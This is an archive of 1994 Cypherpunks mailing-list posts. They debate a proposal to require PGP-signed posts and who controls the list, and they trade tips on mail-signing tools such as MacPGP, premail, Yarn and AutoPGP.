Not only does MacPGP allow you to sign the clipboard, but there are applescripts available so you can sign the clipboard without even switching to MacPGP and doing it manually. Just choose the script from a pulldown menu, and everything happens automatically (you have to type in your passphrase, of course). Additionally, there are scripts for Eudora such that you don't even need to mess with the clipboard. You choose one script from a menu, click on the "sign" button, and your outgoing mail is signed. It would be trivial to convert the script to sign automatically instead of asking you whether you want to sign, encrypt or both.

For whatever reasons, the tools that are there aren't good enough for Tim. Which is fine, I admit they still aren't perfect, and Tim, from what I understand, has a complicated situation wherein mac tools aren't good enough, he needs unix tools too. Personally, I've found unix and mac tools that are easy enough for me to use, but maybe I'm just a gearhead. Eventually easy-to-use-by-Tim's-standards tools will come around, and he'll use them. Or they'll never come around, and he won't.

But I think many of his posts are really misleading in implying that there aren't any relatively easy-to-use tools out there. Maybe they're not easy enough for Tim (and I'm not being at all disparaging here. I am perfectly willing to admit that there is quite a bit of room for improvement with the existing tools), but I think the existing tools are orders of magnitude better than what existed, say, 8 months ago. I use premail on the unix, and the aforementioned applescripts on my mac, and I am finally using PGP relatively regularly, whereas 8 months ago the tools just weren't available that were simple enough for me to use.

Again, I don't mean to be knocking Tim here.
If the tools still aren't easy enough to install/use for Tim, I respect that. I just don't want people to get the wrong idea, and think that there aren't _any_ tools out there, or that the cypherpunks haven't been doing anything and there hasn't been any improvement in tools. I see incredible improvement in ease-of-use of available tools in the past 8 months to a year.

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLt4A9/HuNBekDKXJAQFmcAP/UedPs8ddpt4EHXTuo1ZkYiGrn9J9zSuy
00xM7B1XkiqJqmyOXU8pDaEHkmnEw/wkVH8Ibi8Ve8CtIiNA8xU5EOOCdp7J+Zh8
XwMiZES/J4f28WuipfN5dRPbwRI+aySKdJazOx0Wio2z+X1mtKvBmLQMrH09OlQ0
p1xi1HaGc0k=
=iMRI
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Thu Dec 1 09:01:17 1994
From: hfinney at shell.portal.com (Hal)
Date: Thu, 1 Dec 94 09:01:17 PST
Subject: FWD: Oceania WWW site announcement
Message-ID: <199412011701.JAA19689@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

We have had some discussion on the topic of new countries here so I thought I would forward this short note. I haven't looked at the web page yet. Apologies if you've seen it already.

========== Forwarded message ==========
SENDER: Eric Klien
Subject: ANNOUNCE: Oceania: The New Country - WWW Site

A new web site has opened containing files related to the new country in development, Oceania. You may get the Constitution and Laws, plus information on related books such as The Atlantis Papers and The Millennial Project. You may also view true color pictures of Oceania plus view back issues of the Oceania Oracle. Animations of Oceania are also online as well as information on how to receive an Oceania passport.

The web is located at http://unicycle.cs.tulane.edu/oceania

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLt4BKhnMLJtOy9MBAQHt+AIAiJtsWrq+eQQ57xk9/XXuMtQ5eGUO2laV
piQBPtpOQvn/2/tum3YUwG24cAhY3SleFynFXOzxJury7EbvRYStwA==
=K3yA
-----END PGP SIGNATURE-----

From jamesd at netcom.com Thu Dec 1 09:04:41 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 1 Dec 94 09:04:41 PST
Subject: We are ALL guests (except Eric)
In-Reply-To:
Message-ID: <199412011704.JAA19839@netcom12.netcom.com>

Jonathan Rochkind writes
> Assuming Eric could trademark the list, but just chooses not to, then
> what's to stop _me_ from getting a trademark on the name "cypherpunks" when
> I start my own competing list?

Nothing, other than the fact it would not be the cypherpunks list, and there would not be a mass migration from Eric's list to yours.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at acm.org

From jrochkin at cs.oberlin.edu Thu Dec 1 09:23:29 1994
From: jrochkin at cs.oberlin.edu (Jonathan Rochkind)
Date: Thu, 1 Dec 94 09:23:29 PST
Subject: We are ALL guests (except Eric)
Message-ID:

At 12:04 PM 12/01/94, James A. Donald wrote:
>Jonathan Rochkind writes
>> Assuming Eric could trademark the list, but just chooses not to, then
>> what's to stop _me_ from getting a trademark on the name "cypherpunks" when
>> I start my own competing list?
>
>Nothing, other than the fact it would not be the cypherpunks list, and
>there would not be a mass migration from Eric's list to yours.

Well yeah. That was my point. Whatever "ownership" Eric has of the list isn't dependent on trademarks, or on the fact that he was one of the "originators" of the list. It's dependent on the fact that we all use the cypherpunks that Eric administrates. Of course there is nothing to directly stop Eric from doing whatever he wants to configure the particular software currently running cypherpunks to do whatever he wants. But some of us, or most of us, or all of us, could just move to another list.
Nearly painlessly, if the new list we moved to were set up to mirror the "real" cypherpunks, but without whatever rules we don't like.

"The cypherpunks list" isn't the particular process that happens to be running on toad.com right now. It's not even the address "cypherpunks at toad.com." Eric has control over one of those, and John Gilmore has control over the other one, but "the cypherpunks list" isn't either of those, it's the group of subscribers and the articles they write, and no one "owns" that.

From jamesd at netcom.com Thu Dec 1 09:27:13 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 1 Dec 94 09:27:13 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412011110.DAA26299@netcom3.netcom.com>
Message-ID: <199412011726.JAA22930@netcom12.netcom.com>

Timothy C. May writes
> > > I rarely argue in terms of
> > > justice and fairness, so please don't imply that I have done so.

James A. Donald wrote:
> > Look at the title of this thread. If what you say is true,
> > you would not have responded to this thread. The title
> > would be meaningless or irrelevant to you.

Timothy C. May writes
> Huh?

The title of this thread makes an argument based on rights and obligation. It claims that Eric has the right to act without consensus.

If you were merely making the argument that Eric is unwise to act, you would not have bothered to reply to this thread, since it does not address the issue of whether Eric is wise or unwise, but only the issue of who is entitled to decide.

You were making the argument that Eric does not have the right, the authority to act without consensus, that he is improperly usurping the authority or rights of other founding cypherpunks.

In other words you are responding to a moral argument with a moral argument. It is just that you use double talk and I speak plainly.
Your argument is based on labor mingling theory, even though you seem to be unfamiliar with these concepts, (or perhaps you are familiar but simply refuse to the language of ethics.)

While labor mingling theory has great moral authority, long usage on the internet has consistently gone the other way, and with the passage of time, this counts.

The nature of the underlying protocols leads to collective ownership of newsgroups and private ownership of lists, and attempts to get away from this natural arrangement to something more useful and more just have not worked very well.

--
---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at acm.org

From cactus at bb.hks.net Thu Dec 1 09:28:43 1994
From: cactus at bb.hks.net (L. Todd Masco)
Date: Thu, 1 Dec 94 09:28:43 PST
Subject: New signing service
Message-ID: <3bl1cc$7mn@bb.hks.net>

Okay, this is a-what *I* am going to do right now.

Today, I'll throw together a mechanism on cypherpunks at hks.net that will sign all messages coming through it and send them on to cypherpunks at toad.com. It'll have a key with a 384-bit modulus, included below.

It will not (now) check signatures on incoming mail. It might in the future.

To be clear, this is not what I suggested before: I will not be generating a new key for each message. This is also not a service that guarantees the integrity of mail before it reaches here: mail can easily be forged to this site.

This will guarantee one and only one thing: that a message signed by this service has been received by cypherpunks at hks.net and forwarded to cypherpunks at toad.com. The only thing that this prevents is having mail forged to a subset of cypherpunks appear as though it went to all of cypherpunks.
If this is successful I can later go on to attack the signing question, though I think key management is likely to be a genuine pain in the ass for that, probably requiring human interaction on a per-key basis. Also, when the software works smoothly it could be moved to toad.com.

I think part of the job of mailing list software is to guarantee the integrity of the envelope of a message: signing all messages is a clear step towards that goal.

Please send comments to me directly at cactus at hks.net, since I won't necessarily be catching up on cypherpunks while I'm working on this.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQA9Ay7eB60AAAEBgOGkDzo6mkSp3G4W3EXwMWK8SrTVSmosuN5Y7Z2FdBS5uJ3o
1O0XNAwqGc8CJ9W3bQAFEbQuQ3lwaGVycHVuayBzaWduaW5nIGFnZW50IDxjeXBo
ZXJwdW5rc0Boa3MubmV0Pg==
=ajZM
-----END PGP PUBLIC KEY BLOCK-----

--
Todd Masco        | "Roam home to a dome, Where Georgian and Gothic once stood
cactus at hks.net  | Now chemical bonds alone guard our blond(e)s,
cactus at bb.com   | And even the plumbing looks good." - B Fuller

From werewolf at io.org Thu Dec 1 09:31:54 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 1 Dec 94 09:31:54 PST
Subject: "You aren't following the _rules_!"
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

In article <7SMtkKjqRa71075yn at skypoint.com>, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>In article , you wrote:
>> > I usually dial in to poly, I don't have (yet) a unix box on the net
>> > to make signing easy. Until the DOS or Mac versions of PGP include
>> > a built in terminal and mailer...
>>
>> You can use uqwk to download/upload both news and mail. You can then
>> read/reply with an offline reader like yarn or ReadMail. Yarn has hooks
>> to PGP, so signing a message is a menu choice. Installation could be
>> easier, but once it's done, the combo works very smoothly.
>
>Even better yet use AUTOPGP and everything is signed automagicly.

Any idea as to where I can get a copy of AUTOPGP?
I'm a YARN user but would like to check it out.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLt4Csa+YbMzawbu5AQEF7wQAxC9BxtvE4UPKQae3ti6eKfbvOCFBDAJJ
v4nip8rYlZOfSd1TwjW0x1qwLwYtbthJ2ISzVaoLTgpEfpo+E8sNs49qHGtZwiSz
yLJQuM7x+VN12hg0CACiPZCd6BK6evi5ZvfU4lwToJGABrhxPpteG6dUEkEdtRkU
6+dAoqNtCyI=
=2LQb
-----END PGP SIGNATURE-----

From werewolf at io.org Thu Dec 1 09:38:57 1994
From: werewolf at io.org (Mark Terka)
Date: Thu, 1 Dec 94 09:38:57 PST
Subject: AUTOPGP
Message-ID:

Anyone know where I can get a copy of AUTOPGP? I'd like to try it out and see whether it has any advantages over YARN's integrated PGP functions.

--------------------------------------------------------------------------
Mark Terka     | werewolf at io.org              | public key (werewolf) by
Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request
---------------------------------------------------------------------------

From merriman at metronet.com Thu Dec 1 09:55:49 1994
From: merriman at metronet.com (David K. Merriman)
Date: Thu, 1 Dec 94 09:55:49 PST
Subject: Phbbbbbbbbt!
Message-ID: <199412011756.AA24181@metronet.com>

***************** Begin PKP Signed Message *****************
Version 3.14159

A Proposal That It Be Resolved:

* That Eric can, and will, do as he sees fit with the Cypherpunks mailing list on toad.com.

* That Eric can, and will, do whatever he's going to do, whenever he does it.

* That many have made their positions clear - amply, and repeatedly - on what they think of the various proposals put forth in response to Eric's initial posting, the clarifications, the clarified clarifications, the counter-proposals, counter-counter-proposals, ad nauseam.

* That if/when Eric does something that those on the Cypherpunks mailing list do/don't agree with (or otherwise find inconvenient, distasteful, awkward, reprehensible, foolish, appropriate, called-for, suitable, necessary, ad nauseam), they will respond as they feel appropriate.
* That responses to any actions taken by Eric may include letters of support/condemnation, forged/faked information, leaving in a snit/huff/quietly/loudly, formation of a C1Ph3rD00Dz mailing list, ranting, raving, cheering, applause, or whatever else the individual may feel appropriate.

* That Eric has had ample opportunity to see the response to his proposal, and will therefore take it into consideration as he feels appropriate.

* That the subject will not be properly addressed and resolved until and unless some _definitive_ action occurs.

* That until and unless such action occurs, anything else is so much flailing about madly, with a fair measure of High Blood Pressure and Hurt Feelings tossed in.

* That the subject has now been flogged to death, and that further discourse on it only serves to fragment the CP mailing list.

Respectfully Submitted
Dave Merriman

***************** Begin PKP Signature *****************
1
*******************************************************
****************** End PKP Signed Message ******************

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From blancw at microsoft.com Thu Dec 1 09:57:34 1994
From: blancw at microsoft.com (Blanc Weber)
Date: Thu, 1 Dec 94 09:57:34 PST
Subject: Mandatory sig workaround
Message-ID: <9412011757.AA05329@netmail2.microsoft.com>

From: Eric Hughes

My priorities on this are to get myself set up for signing. Then I need to get a recognizer written, then to hack vacation to use alternate database files, then to get my own personal resource list compiled, then to set my personal nagware. Only after all that do I intend to alter the list.
...................................................................... ...........
Me too - I'll sign my posts when I'm good & ready.

Blanc

From yusuf921 at uidaho.edu Thu Dec 1 10:03:43 1994
From: yusuf921 at uidaho.edu (Syed Yusuf)
Date: Thu, 1 Dec 94 10:03:43 PST
Subject: WHAT THE.. (was: Manditory key sig..
Message-ID:

in all this discussion about how well it would work and ways around it, I think I've missed the problem that people are trying to solve.

isn't it ironic that privacy advocates are suggesting mandatory loss of anonymity (which is what forced signing is).

From merriman at metronet.com Thu Dec 1 10:04:04 1994
From: merriman at metronet.com (David K. Merriman)
Date: Thu, 1 Dec 94 10:04:04 PST
Subject: Pbbbbbbbbbt!
Message-ID: <199412011804.AA25584@metronet.com>

***************** Begin PKP Signed Message *****************
Version 3.14159

A Proposal That It Be Resolved:

* That Eric can, and will, do as he sees fit with the Cypherpunks mailing list on toad.com.

* That Eric can, and will, do whatever he's going to do, whenever he does it.

* That many have made their positions clear - amply, and repeatedly - on what they think of the various proposals put forth in response to Eric's initial posting, the clarifications, the clarified clarifications, the counter-proposals, counter-counter-proposals, ad nauseam.

* That if/when Eric does something that those on the Cypherpunks mailing list do/don't agree with (or otherwise find inconvenient, distasteful, awkward, reprehensible, foolish, appropriate, called-for, suitable, necessary, ad nauseam), they will respond as they feel appropriate.

* That responses to any actions taken by Eric may include letters of support/condemnation, forged/faked information, leaving in a snit/huff/quietly/loudly, formation of a C1Ph3rD00Dz mailing list, ranting, raving, cheering, applause, or whatever else the individual may feel appropriate.

* That Eric has had ample opportunity to see the response to his proposal, and will therefore take it into consideration as he feels appropriate.
* That the subject will not be properly addressed and resolved until and unless some _definitive_ action occurs.

* That until and unless such action occurs, anything else is so much flailing about madly, with a fair measure of High Blood Pressure and Hurt Feelings tossed in.

* That the subject has now been flogged to death, and that further discourse on it only serves to fragment the CP mailing list.

Respectfully Submitted
Dave Merriman

***************** Begin PKP Signature *****************
1
*******************************************************
****************** End PKP Signed Message ******************

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From eric at remailer.net Thu Dec 1 10:19:03 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 10:19:03 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <199412011109.DAA26184@netcom3.netcom.com>
Message-ID: <199412011917.LAA13408@largo.remailer.net>

   From: tcmay at netcom.com (Timothy C. May)

   I haven't said I plan to leave the list. I've said that if my posts are blocked/bounced/rejected, I would likely choose not to remain.

Let me ask something more proximate. Tim, if the server puts a header on mail that identifies it as unsigned, how will you feel about seeing your mail marked as such? What might you do about such a situation?

   I will register a note of purely personal frustration that many have framed the current debate in terms of "Eric's list" and "If Eric wants to do it this way, then this is how it should be done," etc. I have no animosity toward Eric, but think this is a misguided rewriting of history.

Ah, assigning credit.

Let the world know that there would be no cypherpunks without both Tim May and me.
Tim and I met at a party at Hugh Daniel's place; we were the first two to arrive. We became pretty much instant friends when I said that I was going to work with Chaum in Amsterdam. A year later Tim was gracious enough to put me up at his place for a few days when I was there, ostensibly as it turned out, to look for housing. I was much more interested in conversation than accommodations, and Tim and I had a three day conversation in which the germ of cypherpunks was developed (among many others). Tim and I spent a lot of time later working on the first meeting, which was held with people we both knew.

Why is it then, that people refer to "Eric's list"?

At our first meeting, John Gilmore offered both a computer for a mailing list and a site for a meeting. We are no longer meeting at Cygnus, but we are still using John's machine. I began maintaining the mailing list, and with this was a symmetry breaking. As many of you know, I spent hours and hours and hours doing mailing list maintenance (adding and deleting by hand) and dealing with all of the problems. I don't spend so much time on that anymore because of majordomo, but I still do deal with the bounces and the complaints and the exceptional requests.

Cypherpunks is certainly _not_ "Eric's group", but the mailing list is not unreasonably called "Eric's list".

Personally, I hate the term "Eric's list". I try to avoid saying "my list" in conversation as shorthand for "the list I'm the maintainer for" because of the potential confusion with "the list I own". I find the property argument, at root, specious. Information can't be owned in any sort of natural sense, even though one _can_ remain vigorously silent. The comments of Dave Mandl and Todd Masco about the social character of mailing lists address the actual issue, which is political and not legal.

Yet there is still the realpolitik that I do maintain the list.
While there are some internal checks (I need Hugh's cooperation for certain things), the fact remains that I can make changes basically unilaterally. Pragmatically speaking, the phrase "Eric's list" reflects this situation.

In addition, the phrase is short. When one is not distinguishing between subtleties, short phrases win and long phrases lose.

So there are three reasons why the phrase arose: history, position, and brevity. When a deduction from the phrase relies upon some other possible subsumption, all may rightly point out an unintended meaning.

Now we must shift subjects. What good is assigning credit if no use can be made of it? Many substitutes are available for obtaining a good feeling.

Social position allows one to influence the world. One of the most valuable abilities in the world is the ability to get people to listen to you. This is not new, merely highlighted by the collapse-generating properties of computer networks. Tim and I and many others have spent much time devoted to writing clearly enough that we will be listened to preferentially, both for clarity itself and for the anticipation of clarity.

The whole "cypherpunks write code" nexus assumes this communication process. It's comfortable to write manifestos, express your position, be indignant at the government, and teach privacy. We generally live in free societies where there is little recourse taken against speech. It is much less comfortable to use tortious cryptography, run a remailer, finesse export controls, and deploy code. Far and away the most extreme reactions have come from what people did and not from what they said. Speech affects the world, but action affects it more, because every word that affects the world only through a sequence of body motions.

Cypherpunks get listened to not because we talk a lot; that's insufficient. Cypherpunks get listened to because we do things. "Actions speak louder than words" is true for local politics as well as global.
Both Tim and I yammer a lot, but I do the list work. The asymmetry is not incidental. In discussing potential server actions, I do not feel constrained to come to agreement with any single voice, including Tim. I have a lot of respect for Tim and with respect to cypherpunks generally I try not to put myself above him, but with respect to the technical underpinnings of the list I feel no such constraint. This difference is a long consequence of actions chosen by both parties.

Now, Tim, I don't know exactly that you feel slighted in this debate with respect to origins and their values, but I suspect that you do. If so, I regret that, but ask you to, well, deal with it. Symmetry is broken, cypherpunks is no longer new, and we who appeared interchangeable to the world two years ago now seem different.

Eric

From blancw at microsoft.com Thu Dec 1 10:21:50 1994
From: blancw at microsoft.com (Blanc Weber)
Date: Thu, 1 Dec 94 10:21:50 PST
Subject: We are ALL guests (except Eric)
Message-ID: <9412011821.AA07476@netmail2.microsoft.com>

From: Eric Hughes

These discussions on the interest of power are fascinating to me. So many of them do not take into account my own desires to create a useful discussion forum, which desires bind me tighter than any law ever could. There are some very interesting implications of this _de facto_ solipsism to achievement of equilibria in games with iterated dominance.
.........................................................................

Eric is so cool for starting a flame war about his authority, on his very semi-own list. Turn-around is fair play, do unto others, and all that.

For myself, I list below some items of importance which I would look for in deciding whether to participate with expectations of complicity to any given 'rules':

. advance knowledge of the requirements & procedures
. whether they are consistent with the purpose they serve
. whether there has been an intelligent argument presented which would convince me that it is more advantageous to do as expected, than not
. that there have been means provided to be able to follow through, or that
. there has been information provided on how to obtain the means needed for follow through
. that information is available on how to overcome the obstacles & difficulties which could prevent adherence to the given requirements

i.e., that those who place certain requirements upon membership also make it possible to comply with them by preparing the way, making it easy to do so and providing sufficient appeal to make it worth the trouble.

Blanc

From merriman at metronet.com Thu Dec 1 10:24:26 1994
From: merriman at metronet.com (David K. Merriman)
Date: Thu, 1 Dec 94 10:24:26 PST
Subject: apologies
Message-ID: <199412011824.AA29260@metronet.com>

My apologies for the second posting of my Proposal - the first one came back from toad at the end of a notice that an individual's account was closed (??).

Dave Merriman

- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at feenix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From eric at remailer.net Thu Dec 1 10:51:21 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 10:51:21 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To: <199412010119.RAA06900@python>
Message-ID: <199412011950.LAA13468@largo.remailer.net>

   From: "Dr. D.C. Williams"

   While I can see merit in both sides, the pro-sig argument is weakened by their endorsement of sig spoofing. If the object is to heighten awareness of crypto and digital signatures, what possible Good can follow from setting the example that "cypherpunks simulate signatures"?

To someone who doesn't know what a digital signature is at all, it doesn't matter if it's real or faked.
Communication to these people is entirely from the odd-looking form of the appendages.

The ability to spoof a signature is an artifact of incomplete notions and implementations about key distribution. Were these problems solved, I would consider actually verifying all signatures. These problems are not solved to my satisfaction, however.

The inability to check a signature does not, however, render useless those other functions that still work. I advocate partial progress, and the lack of a benefit is not sufficient argument against things that actually work.

The way I see it, either sign or don't sign, but attaching a bogus signature block to a message for the sole purpose of pacifying a mailing list requirement diminishes the significance of crypto and sullies the image of all who participate.

If you don't have a public key, it doesn't matter if the signature was real or faked; you still can't verify it.

One of the purposes of this proposal is to encourage people to change their software to automatically sign. The harder part of this is to change it to do anything automatically. The signature making part is fairly trivial by comparison. The benefit I want more, of the two, is the automaticity. If, for whatever reason, actual signing can't happen, I am content with the form of a signature.

Make a new key pair that's used solely for the purpose of signing your list mailings.

That's fine, and I agree with the idea as a solution to the insecurity of keys on a public machine. I do not, however, feel I need to insist that everyone do this.

By the same token, I don't see how this proposal does much to spread the Good Word.

1. Crypto-unaware people will see the form and ask what it is.

2. Crypto-aware people will alter their software to do something automatically.

2a. Many, perhaps most, of these people will use real crypto once auto-something already set up.

Eric

From geoffrey at crl.com Thu Dec 1 11:06:11 1994
From: geoffrey at crl.com (Geoffrey Faivre-Malloy)
Date: Thu, 1 Dec 94 11:06:11 PST
Subject: Pine and PGP
Message-ID:

Is there a way to have my messages signed automatically with Pine and PGP?

Geoffrey
--------------------------------------------------------------------------
| Geoffrey at crl.com        The opinions expressed herein may or      |
| Geoffrey Faivre-Malloy    may not be the opinions of my employer.   |
| Purple Duck Software      Like anyone really cares...               |
--------------------------------------------------------------------------
| Snail Mail: 613 Calibre Springs Way, Atlanta GA, 30342                 |
--------------------------------------------------------------------------

From eric at remailer.net Thu Dec 1 11:07:07 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:07:07 PST
Subject: "Cyherpunks Named Official Signing Authority"
In-Reply-To: <74242.pfarrell@netcom.com>
Message-ID: <199412012005.MAA13503@largo.remailer.net>

From: "Pat Farrell"

Re: majordomo alterations so that it pipes messages thru a filter to classify signatures.

[...] We get classes like: [5 listed]

What I was thinking was the following. There would be a recognizer that, given a message, would output "yes, something looks like a signature to me", or "no, there is nothing that I recognize as a signature". Based on this true/false answer, the server would either perform an action, or not. I was thinking of no notion of classes, but rather mere presence or absence.

Maybe we need to have majordomo sign the message/header so we know that the true c'punk classifier has verified it?

WARNING: The following paragraph does not have direct relevance to the issue at hand. It discusses servers which might verify signatures, which my current proposal does not have in it.

What I have realized in the interim is, that if a server is to verify a signature, the server should sign not the message but rather the signature.
After all, the signature is what was being verified, not any property of the message. The user can still detect message alteration, by first verifying the sig-on-sig, and then comparing the hash value in the original sig to a hash on the message.

But then we ask, Hmmm, is this a hacked majordomo? After all, no sane person will read and manually verify the flood of c'punk messages. So some daemon is doing it all. And daemons can be hacked.

Trust always terminates somewhere. How far back you go is a question of worth and of effort. Ceding some trust to toad.com may be desirable for some but not for others. Merely because it is not a complete solution to all problems doesn't mean it's not worth doing.

anyone else see a solution?

I do, but it involves program+proof ideas and is far from ready for deployment. I have no interest in solving those problems right now. There is benefit to be had from crypto, even if the first implementations only protect certain things.

Eric

From eric at remailer.net Thu Dec 1 11:13:51 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:13:51 PST
Subject: We are ALL guests (except Eric)
In-Reply-To: <3bje7f$snh@bb.hks.net>
Message-ID: <199412012012.MAA13524@largo.remailer.net>

From: cactus at bb.hks.net (L. Todd Masco)

>To reiterate, I am willing to use my
>position to send a stronger message.

Sure. I'm not sure the message would get through as you're framing it, though. People don't react well to messages that are put too strongly... a gentle, gradual approach is more likely to get through.

Several approaches to gradualism have been usefully suggested in this debate, and I appreciate that. Just to be sure, I was expressing a willingness, not an imminent intent.

Eric

From eric at remailer.net Thu Dec 1 11:16:21 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:16:21 PST
Subject: Warm, fuzzy, misleading feelings
In-Reply-To:
Message-ID: <199412012014.MAA13543@largo.remailer.net>

From: werewolf at io.org (Mark Terka)

If that's the case.....isn't it an equal pain in the ass to go to the trouble of forging a sig? :> You would likely have to go through more key strokes and other routines to forge one. Why not just play by the rules and sign a message?

This is a perfectly good rephrasing of one of the main rationales behind the proposal, namely, that the architectural issues are more important than the actual crypto use. (Not exclusively important, but more important.)

Eric

From tcmay at netcom.com Thu Dec 1 11:18:24 1994
From: tcmay at netcom.com (Timothy C. May)
Date: Thu, 1 Dec 94 11:18:24 PST
Subject: Mandatory sig workaround
In-Reply-To: <941201.071127.7W2.rusnews.w165w@cybrspc.mn.org>
Message-ID: <199412011918.LAA21104@netcom4.netcom.com>

Roy M. Silvernail wrote:

> > "Plenty of irons in the fire" is indeed the crucial point. Learning
> > how to make UQWK talk to AutoPGP in elm (or whatever) is apparently
> > fine for some people (by my estimate, 20% of those who post), but many
> > of the most valued (who shall remain nameless here) posters are *not*
> > signing posts. I urge you all to watch who signs and who doesn't.
>
> It may just be that it's early and I'm only on my first cup of coffee,
> but are you suggesting an inverse correlation between the quality of a
> submission and the presence of a signature, Tim? While I'd agree that
> many of the quality list members don't sign their articles, I don't
> think I can make the leap that signed messages have no useful content.
> Please tell me I misread you.

No, I didn't propose such a correlation. Just a reminder that _many_ active posters are not routinely, or ever, signing.
This is probably not due to a minor (few second) delay but, rather, to much larger hassles (discussed here often, but having to do with editors on remote machines not having access to PGP tools and keys on local machines--this can be solved by moving the PGP onto the remote machine or by sending the file to local machines with sz, etc.).

> > Face it, some fraction of people on this list are gearheads, with
> > their own Pentiums or Suns sitting on the Net and with lots of
> > Unix/Linux tools they like to play with and that they can use to
> > compile their premails and procmails and whatnot. More power to them.
>
> Or perhaps just a lowly 486 running DOS and UUCP. But I heard that
> Cypherpunks Write Code, so I wrote PGP support into my signature
> controller. I have signed all my email for 2 years, and all net traffic
> for nearly a year. Gearhead? Perhaps I am. But this ain't no Porsche.

Like I said, "more power to them." I haven't gone this route, and face, under the proposed system(s), delays and perhaps bounces. For many reasons I think this is an unwise proposal.

> Which only underscores the need for better tools for the existing
> platforms. Yes, I'd like everyone to sign their traffic. But it's not
> always possible when the tools to do that are either non-existent or
> arcane (which means I'm in agreement with Tim on why he doesn't sign his
> traffic).

You've just answered your earlier points.

Let me recount something that hasn't been mentioned on the list. At the last Cypherpunks meeting, well-known Unix gearhead Raph Levien demonstrated his premail work: nearly transparent encryption, decryption, remailing integrated into "pine," a mailer. Something this "simple" (no insult to the work meant...I mean simple in the sense that it is conceptually obvious and expected) drew oohs and aahs from the generally savvy attendees. It tells us something.

(Yes, I may consider switching from my favored mail reader, elm, to pine. But not soon, and maybe not ever.)

> Tim, just for fun, what tools would need to appear to make it possible
> for you to sign your traffic? Maybe a description will inspire some of
> the Macheads out there to get hacking. (the astute reader will note
> that I'm not suggesting new tools to the erstwhile Mr. May, as has been
> done so often in the past)

Others have touched on this. MIME stuff, mail wrappers, etc.

There are three main worlds to consider:

1. Users on their own secure machines, composing, signing, and encrypting with tools on their own machine. Completed messages are either mailed (e.g., Eudora, dial-up) or are otherwise sent directly (boxes sitting on the Net via SLIP, PPP, TIA, etc.)

2. Users who do some of their work on secure machines (perhaps at home) but log in to remote machines that are not secure against packet sniffers, snooping sysadmins, subpoenas (which may not even be disclosed to the target, as in cases involving money transfers, drug cases, etc.).

3. Users who do most of their work on unsecure machines outside their control. Most corporate users who use corporate machines. Most university students with campus accounts.

PGP can and is used in all of these worlds.

#1 is taken care of by lots of tools. (And if I limited my mail to Eudora, I could cope moderately well. But I don't even have Eudora running on my new Mac configuration yet, and I favor reading mail while logged-on to Netcom. Also, signing Netnews articles--not the topic of current debate--is not addressed.)

#2 is where additional tools are needed. A useful tool: agent-like technology that could "reach back" with a zmodem-like squirting of text to the local/home machine, do the sigs and encryption, and then squirt back the processed text. (Ironically, short messages are moderately easy for me to verify, as I can select the displayed text and use cut-and-paste. So long as all the text is visible.
Longer text messages require that I somehow get the text--often by using sz to send it to my local machine--and this typically takes more steps and requires more choices than I want to deal with.).

#3 users are probably happy in their ignorance and have others to help them with setups and configs. That so many students are diligent about signing their messages--on "foobar.edu"--says a lot about the spread of tools, helps, and common set of tools (e.g., everybody may be using 4.3 BSD and the same core set of editors and mailers).

I am dismissive of #3 because it's toy security. Not a foundation to build on. But OK for students. Or employees. Or casual use.

Enough for now.

--Tim May

--
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay at netcom.com    | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets,
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo at toad.com with body message of only:
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tcmay

From eric at remailer.net Thu Dec 1 11:26:01 1994
From: eric at remailer.net (Eric Hughes)
Date: Thu, 1 Dec 94 11:26:01 PST
Subject: Hazards of encouraging forged dig sigs
In-Reply-To: <199412010326.WAA22171@ducie.cs.umass.edu>
Message-ID: <199412012024.MAA13573@largo.remailer.net>

From: "L. McCarthy"

I foresee a situation in which a large portion of the list traffic uses forged or meaningless signing-server-appended dig sigs. When I establish automatic signature validation for incoming mail here Real Soon Now, there will be plenty of noise generated by all the `false' negatives in the data to make a mockery of the authentication process.

Recall my comments on transaction failure in a different context last week.
What is important there is what happens under failure, not under success. Sig checking requires an analysis of the pragmatics of failure, i.e. what happens.

